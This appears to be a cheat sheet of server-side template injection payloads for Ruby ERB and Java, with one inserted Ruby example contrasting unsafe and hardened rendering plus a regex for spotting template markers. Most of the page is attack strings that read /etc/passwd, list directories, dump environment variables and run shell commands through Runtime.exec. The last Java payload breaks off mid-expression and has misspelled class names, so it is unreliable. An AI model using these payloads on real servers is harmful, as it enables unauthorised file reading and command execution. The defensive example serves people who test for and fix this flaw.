Server Side Template Injection
List of different payloads
Ruby
Basic Injection
<%= 7 * 7 %>
Retrieve /etc/passwd
<%= File.open('/etc/passwd').read %>
List of files and directories
<%= Dir.entries('/') %>
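Why the basic probe above evaluates, and how to stop it, as an added example that is not part of the original page. The method names, the greeting template and the marker regex are assumptions chosen for illustration; the probe string is the one listed under "Basic Injection".

```ruby
require 'erb'

# Constructed sample input: the basic ERB probe listed on this page.
PROBE = "<%= 7 * 7 %>"

# Vulnerable pattern (hypothetical handler): user input is concatenated into
# the template *source*, so any ERB tag inside it is compiled and executed.
def render_unsafe(name)
  ERB.new("Hello " + name).result(binding)
end

# Hardened pattern: the template source is a fixed string. User input is only
# ever passed in as a value and is HTML-escaped when written out.
SAFE_TEMPLATE = ERB.new("Hello <%= ERB::Util.html_escape(name) %>")

def render_safe(name)
  SAFE_TEMPLATE.result_with_hash(name: name)
end

# Defence in depth: flag input carrying the expression delimiters listed on
# this page (ERB tags, ${...}, {{...}}) so it can be logged or rejected
# before it reaches any rendering code.
TEMPLATE_MARKERS = /<%|%>|\$\{|\{\{/

def template_probe?(input)
  input.match?(TEMPLATE_MARKERS)
end

if __FILE__ == $PROGRAM_NAME
  puts render_unsafe(PROBE)        # expression was evaluated server-side
  puts render_safe(PROBE)          # expression was treated as inert text
  puts template_probe?(PROBE)      # true
  puts template_probe?("Alice")    # false
end
```

If the unsafe renderer returns the computed value instead of the literal text, user input is reaching the template source; the fix is to keep the template constant and pass input as data, not to filter individual payloads.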
Java
Basic Injection
${7*7}
${{7*7}}
${class.getClassLoader()}
${class.getResource("").getPath()}
${class.getResource("../../../../../index.htm").getContent()}
Retrieve the system's environment variables
${T(java.lang.System).getenv()}
Retrieve /etc/passwd
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
${T(org.apache.commons.io.IOUTils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Charater).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(}